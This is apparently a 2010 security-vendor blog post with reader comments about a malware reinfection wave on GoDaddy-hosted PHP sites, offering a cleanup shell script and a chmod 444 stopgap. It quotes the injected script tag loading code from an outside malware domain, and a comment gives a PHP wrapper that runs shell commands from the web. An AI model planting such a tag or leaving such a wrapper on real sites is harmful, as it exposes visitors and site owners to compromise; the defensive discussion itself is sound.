Here we go again – Problem at GoDaddy continues

Update from GoDaddy: fewer than 200 accounts were hacked this morning, as they were able to contain it before it spread. In their own words:

Compromised Website Update 5/20/10 – An attack impacting less than 200 accounts happened this morning.

Go Daddy is working with other top hosting providers and security experts to gather information to stop the criminals initiating these exploits.

We have contacted the malware site registrar to remove the offending domain from the Internet, in order to block the attack.

As part of our investigation, Go Daddy has launched a fact-finding tool to collect information about your experience. If you suspect your site was impacted, please fill out our security submission form, located here – http://www.godaddy.com/securityissue.

Thank you, Todd Redfoot, Chief Information Security Officer

Original post: Yes, this is serious. GoDaddy has not fixed their problems yet. Just a few hours ago, we started to notice A LOT of sites reinfected with the "losotrana" malware, which injects this tag into their pages:

<script src="http://losotrana.com/js.php"></script>

It appears to be happening right now: our scanner has just started alerting our customers.

Is your site infected? Our script will fix it again: Simple Cleanup Solution

Details? Everything is the same as: Attacks Continue on GoDaddy

Are you a GoDaddy customer? Call them and demand a fix, seriously!

If you still need help, please contact us: support@sucuri.net.

BIG Bonus: We noticed that the sites where we had set all PHP files to read-only were not affected. The attackers' script does not check or change permissions, so if you chmod 444 all your PHP files you will be safe against this particular attack (444 = r--r--r--, read-only for the owner, the group and everyone else). PHP only needs to read the files, so the site keeps working; what will fail is anything that rewrites existing PHP files, such as the theme/plugin editor and core or plugin updates, until you chmod them back. Note that this is a stopgap, not a fix: anything that runs as your own user (including a PHP file dropped into a writable directory) can chmod the files back.

A simple command to do that would be: find . -type f -name '*.php' -exec chmod 444 {} +

(Using -exec rather than piping into xargs keeps paths that contain spaces from being mangled.)
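Putting the detection, the cleanup and the 444 mitigation together, here is an added example: our own shell script, not Sucuri's cleanup script. It assumes you have shell access to the site root, that the injected payload is exactly the script tag quoted above, and that cleaning a file means deleting that tag; the function names are ours, and the sample site it creates is constructed for the demonstration. The last counting function looks for world-writable directories, because a PHP file dropped into one of those can chmod your files back, so 444 only helps once that number is zero.

```sh
#!/bin/sh
# Added example (not Sucuri's "Simple Cleanup Solution"). Assumes: shell access
# to the site root (passed as $1), and that the payload is exactly the tag quoted
# in the post. Function names are ours.

# The payload quoted in the post.
INJECTED='<script src="http://losotrana.com/js.php"></script>'

# Print the path of every .php/.html file that still carries the payload.
find_infected() {
  find "$1" -type f \( -name '*.php' -o -name '*.html' \) \
    -exec grep -lF "$INJECTED" {} +
}

# Strip every occurrence of the payload from one file. awk index()/substr()
# is used instead of sed so the tag is matched literally, not as a regex.
clean_file() {
  awk -v tag="$INJECTED" '
    { while ((i = index($0, tag)) > 0) { $0 = substr($0, 1, i - 1) substr($0, i + length(tag)) }
      print }' "$1" > "$1.tmp" && mv "$1.tmp" "$1"
}

# Clean every infected file under the site root (edits in place; back up first).
clean_tree() {
  find_infected "$1" | while IFS= read -r f; do clean_file "$f"; done
}

# The post's mitigation: make every PHP file read-only (r--r--r--).
# -exec ... + instead of "| xargs" so paths with spaces survive.
lock_php() {
  find "$1" -type f -name '*.php' -exec chmod 444 {} +
}

# Number of PHP files the owner can still write to (0 after lock_php).
count_writable_php() {
  find "$1" -type f -name '*.php' -perm -200 | grep -c ''
}

# Number of world-writable directories. A dropped PHP file in one of these can
# chmod the files back, so 444 alone is not enough while this is non-zero.
count_world_writable_dirs() {
  find "$1" -type d -perm -002 | grep -c ''
}

# Constructed sample site for trying the functions out: two infected files,
# one clean file and one world-writable upload directory.
make_sample() {
  mkdir -p "$1/inc" "$1/uploads"
  chmod 777 "$1/uploads"
  printf '%s\n' "<?php echo 'home'; ?>$INJECTED"          > "$1/index.php"
  printf '%s\n' "<html><body>about</body></html>$INJECTED" > "$1/about.html"
  printf '%s\n' "<?php echo 'clean'; ?>"                   > "$1/inc/clean.php"
}

# Usage: sh harden.sh /path/to/site
if [ "${1:-}" ]; then
  echo "infected files:"
  find_infected "$1"
  clean_tree "$1"
  lock_php "$1"
  echo "writable php files:   $(count_writable_php "$1")"
  echo "world-writable dirs:  $(count_world_writable_dirs "$1")"
fi
```

Run it as `sh harden.sh /path/to/site`. It edits files in place, so take a copy of the site first. On shared hosting without shell access the same commands can be run from a PHP wrapper, as in the comments below, but delete that wrapper as soon as it has run: a PHP file that executes shell commands from the web is exactly what the attacker wants to find.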

BIG Bonus #2: GoDaddy's FTP servers are down for a few hosts. Very helpful for people trying to fix their sites.

As always, if you are having difficulties getting your site cleaned up, send us an email at support@sucuri.net or visit our site: Sucuri.net. We can get your sites cleaned up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.

  • Anonymous

    Hello,

    Configured the file monitor plugin for WordPress.

    I got the following again today for my GoDaddy Hosting account:

    This email is to alert you of the following changes to the file system of your website at http://www.******.com
    Timestamp: Thu, 20 May 2010 13:57:20 +0000

    Added:
    berkeley_ellary.php

    I checked that file but it was empty, and after a couple of minutes it was removed. Hopefully my files didn't get changed for a third time.

    Let's see what's going on.

  • Anonymous

    Sheesh, and I thought things were bad when I retired from tech in '02 because no one was paying attention or listening anymore.

  • Anonymous

    Got a client running drupal on godaddy servers. Not a problem so far. Wonder if this is limited to wordpress installs?

  • Anonymous

    Thanks a lot for keeping this blog up to date. That script works every time!

  • Anonymous

    Seriously someone needs to come up with software that firewalls, scans, and cleans for these platforms.

    Norton WordPress Protection or something.

  • Anonymous

    Pardon my ignorance, but how does one actually perform this operation:

    >> A simple script to do that would be: find ./ -name "*.php" -type f| xargs chmod 444 <<

    That is, if the site is hosted on Go Daddy, how can I invoke that script? Is it through their hosting center or via FTP?

  • http://www.wheresmydrink.com Scott

    I second his question!!!!!!!!!!!!!

    Pardon my ignorance, but how does one actually perform this operation:

    >> A simple script to do that would be: find ./ -name "*.php" -type f| xargs chmod 444 <<

    That is, if the site is hosted on Go Daddy, how can I invoke that script? Is it through their hosting center or via FTP?

  • http://www.blogger.com/profile/14980808976404159238 http://sucuri.net

    Scott, Anonymous:

    Create a PHP script with the following:

    <?php
    // Runs the chmod from the web server's account on hosts without shell access.
    $out = shell_exec('find . -type f -name "*.php" -exec chmod 444 {} +');
    echo '<pre>' . htmlspecialchars((string) $out) . '</pre>';
    // Delete this file once it has run: it executes shell commands from the web.
    ?>

    Then go to your browser and execute it…

  • John

    If we change all permissions on PHP files to 444, how will that affect WordPress? Will we be able to upload files, edit the files when logged into our dashboard, etc?

  • http://www.blogger.com/profile/05877671849645884790 Peter

    @anonymous:

    "
    Got a client running drupal on godaddy servers. Not a problem so far. Wonder if this is limited to wordpress installs?
    "

    No, it affects all PHP-based CMSs. My Drupal site was hacked during the first hacking spree, and several times after that.

    P.

  • FOL

    What John said:

    Will this affect the site in anyway?

  • http://www.blogger.com/profile/09461530513715661711 Singha

    I am on Bluehost and got hit with this attack yesterday night. I have two Tikiwiki groupware sites and two Drupal sites. I'm trying to use the fix mentioned here, but despite it running to completion, it is not stripping any of the bad code out of the php files. Unfortunately, I can't access my Bluehost Control Panel to uninstall any of my sites and do fresh installs because it keeps timing out (maybe too many people trying to do just that on their hacked sites?). So this is not just a NetSol or GoDaddy problem.

  • http://www.w3basis.de/ Bernhard

    Dear Folks,
    if PHP on your host is allowed to invoke find, xargs and chmod, what else is it allowed to do?

    Since everything started with PHP scripts "magically" appearing and disappearing within people's shares, it would appear that directories on your host are world-writable. Possibly set to 777 to accommodate some CMSs' web admin panels (Joomla! comes to mind).

    Putting your file permissions to read-only won't solve the problem, as long as anybody can drop a PHP script into your directories and reverse your chmod.

  • http://www.blogger.com/profile/00235020915895646158 webbcity

    What John and FOL said above…I'm standing by, ready to run this '444' script but am worried that it will make the pages uneditable by WordPress…is that the case?

  • Anonymous

    I have no problems with my WordPress pages after changing permissions to 444.

    The only thing is that you can't edit your template…

  • http://www.blogger.com/profile/00235020915895646158 webbcity

    Thanks Anonymous! Not worried about the template part for now, that's not going to change any time soon.

  • John

    (in reply to 444)… what about file uploads using the WordPress image uploader?

    What about uploading and installing plugins? Or deactivating plugins?

    Maybe I should just create a temp blog and try it.

    However, for some reason I'm a bit skeptical changing permissions to 444 will solve anything. It seems these hacks are coming through the server side.

  • Anonymous

    My site was hacked again… I do not run WordPress or Joomla. I am on shared linux hosting. This is really frustrating.

    5th time this has happened. I changed all of my PHP files to READ ONLY…hope this helps…

  • John

    @sucuri.net – I love what you're doing here helping people know there's a hacking problem and how they can clean up the issues.

    But to be fair, it would be good to also mention how other hosts are *continually* getting hacked as well.

    For some reason, everyone is picking on Go Daddy, but the problem is with other hosts like Bluehost. See here:

    http://bluehostforums.com/showthread.php?t=20572

    I don't work for Go Daddy, am just a customer and I guess just as a business owner myself I hate to see Go Daddy getting blamed so hard and lose customers because everyone keeps blogging about how "Go Daddy was hacked again".

    Then these customers move to hosts like Bluehost under the false impression it's different there.

    Again, love what you're doing here and I'm a fan, just would like to see more awareness that this is happening in general to other hosts and it's not just Go Daddy. Turns out, Go Daddy is telling the truth about this being other hosts' problem too and to be honest, they are correct, it's not helpful to publish what hackers are doing by publishing their code.

  • Anonymous

    Why John, why is it not helpful? Do you think the hackers don't know what they themselves are doing? What does it tell them that they don't already know? …But it tells us a LOT of what we don't already know!

    I also take issue with your defense of GoDaddy. To me it's not that they're the only ones – it's really how they've terribly and ineptly handled the whole thing IMO (for months) and how they've tried to shift all blame and responsibility (erroneously) to the CUSTOMER! Unbelievable, textbook study of how to do it the WRONG way.

  • Bourgy

    444 might mess with your sitemap if you're using a WordPress plugin

  • Anonymous

    I haven't had problems uploading photos, with my sitemap, or with my plugins after changing permissions to 444 on WordPress PHP files.

  • John

    @Anonymous – Replies to your two points:

    First part:

    Why it's not helpful? I suppose to some extent it is helpful for people like us to take a look at it and dissect how it works, but it's also counter productive because for every 1 hacker who knows how to write and execute code like this, there are 50 who don't and want to learn and grow.

    This helps them do that.

    For the most part, I would think all most people need to know is what's happening and how they need to prevent it from happening again. Giving away too much information is teaching young wannabes.

    It's kind of like how to create a dirty bomb. Would you want that information freely spread all over the Internet for everyone to see, or would you rather those kinds of details be bottled up and all we need to know is how to protect ourselves? …. Just an analogy.

    Re: Go Daddy

    You're spot on with how they are handling it with customers and pushing blame elsewhere. They definitely do need to own up to this. In that regard, I couldn't imagine telling my customers it's their problem when in reality it's mine. They have tunnel vision.

    I was just trying to make the point that if we are going to be *aware* of what's going on, we need to tell it all and not just focus on one company.

    Take a look at the title to this article.

    Shouldn't it be "Another round of hacks attack hosting companies but guess who's still shifting responsibility?"

    A bit long, but get my point?

  • Anonymous

    John, thank you for your response. I will say that I don't think any new hackers have been created by reading this blog. I think the attacks continue to be perpetuated by the same (professional) individuals, using the same (sophisticated) modus operandi. GoDaddy themselves (and others) still cannot figure it out, so given the complexity, I don't think anything shared here is really going to "spread" it.

    On the other hand, I can say with absolute certainty that I and my blogs have benefited from the actual details and specifics of the attacks that have been shared here. That is indisputable to me, and as a result I am much better prepared to both defend as well as repair from attacks. And if everybody becomes more knowledgeable about what is happening and how, the attacks themselves in their present form become far less relevant and impactful.

    So yes, I will absolutely take the certainty of the second benefit over the speculation of the first possibility.

  • http://www.blogger.com/profile/07124910946333260861 Dan Allen

    BACKGROUND: Setting up wordpress-fix.php to run via Cron on Godaddy.

    PROBLEM: Since the fix is a php file, it is vulnerable to attack, just like the rest of the php files.

    QUESTION: How do you run the fix via Cron on Godaddy without the fix script getting hacked?

    As always, comments and suggestions are extremely much appreciated.

    Best regards,
    Dan Allen
    Montpelier, Vermont

    p.s. Our site editor is a non-tech professional writer. She researched this attack and wrote a great account, maybe better than any of us techies could write.
    http://vtdigger.org/2010/05/19/digger-dirt-vtdigger-org-survives-virus-attack/

  • Anonymous

    This morning I had another hacker intrusion in my GoDaddy account:

    Log of wordpress file monitor:

    "This email is to alert you of the following changes to the file system of your website
    Timestamp: Sun, 23 May 2010 07:21:51 +0200

    Added:
    jeremias_scene.php"

    Problem continues…

  • http://www.davidecanali.com dcanali

    I contacted GoDaddy saying that I could provide them with a bunch of information I captured, showing the status of the system (running processes, currently logged-in users) at the time of infection. All I received, after 24 hrs, was an automated response saying that they "verified that my website was targeted by an attack and they have successfully removed the malicious code" (actually I had already cleaned up everything). This is really lame…

  • http://www.blogger.com/profile/00235020915895646158 webbcity

    My friend said his site was hacked again this morning… Is there some easy way to check and see if this actually happened? He has been running the cleanup script, and we also changed all files to 444. Anyone else get hacked this morning?

  • JohnR

    Just hacked again! GoDaddy STILL does not have it figured out! A new rogue PHP file appeared in my root directory this afternoon. The last time this happened was May 20th, the date of this post at Sucuri.

    I naturally figured that as things had gotten pretty quiet here and elsewhere, so that maybe GoDaddy had finally figured it out. But no, it's still happening! Today just proved convincingly that I need to move hosts, finally, and fast.

    Changing all the passwords and security settings in the world previously didn't make a difference, but we did it again anyway. Until and unless GoDaddy ever gets a clue on how to stop this on their end, all the blind hope in the world won't make a bit of difference…

    Has anybody else here had a new attack? David, have you heard anything? Thanks, and thank heavens for Sucuri.

    • http://www.davidecanali.com dcanali

      Just had the same attack. A file named atlantic_derrick.php was created in my hosting directory, and executed.

      I found out that someone (probably the GoDaddy security guys) put the following PHP code in /home/content/protect.php, to protect against the attacks (which in the past used a function named inject_in_folder()):

      function inject_in_folder($dir){}

      So I guess this is their great solution to the problem (so you can't just re-declare it in your scripts) :/

      • JohnR

        Thank you, so it's not an isolated incident and there will no doubt be others… The puzzling thing is I tracked out the series of attacks since April 15th on my calendar, and it appears they are coming every 2.5 weeks, almost like clockwork…

        It's a travesty that despite everything over the past two months, GoDaddy is still appearing helpless to stop it, only to try to react. I have had my fill of what appears to be continued incompetence and will be moving all sites this weekend to HostGator.

  • http://twitter.com/whostingreview Web Hosting Review

    All my pages got hacked for 2 months straight. I finally got fed up with it and switched. They could have cared less. Kind of odd because I run a web hosting review site! I would have some random php code that was a mile long installed on all my files. GoDaddy told me it was my problem not theirs! Well, I am not their customer no more so I guess those words have spoken for themselves.

    This Godaddy review pretty much sums it up!
    http://www.the-best-web-hosting-service.com/godaddy-review.php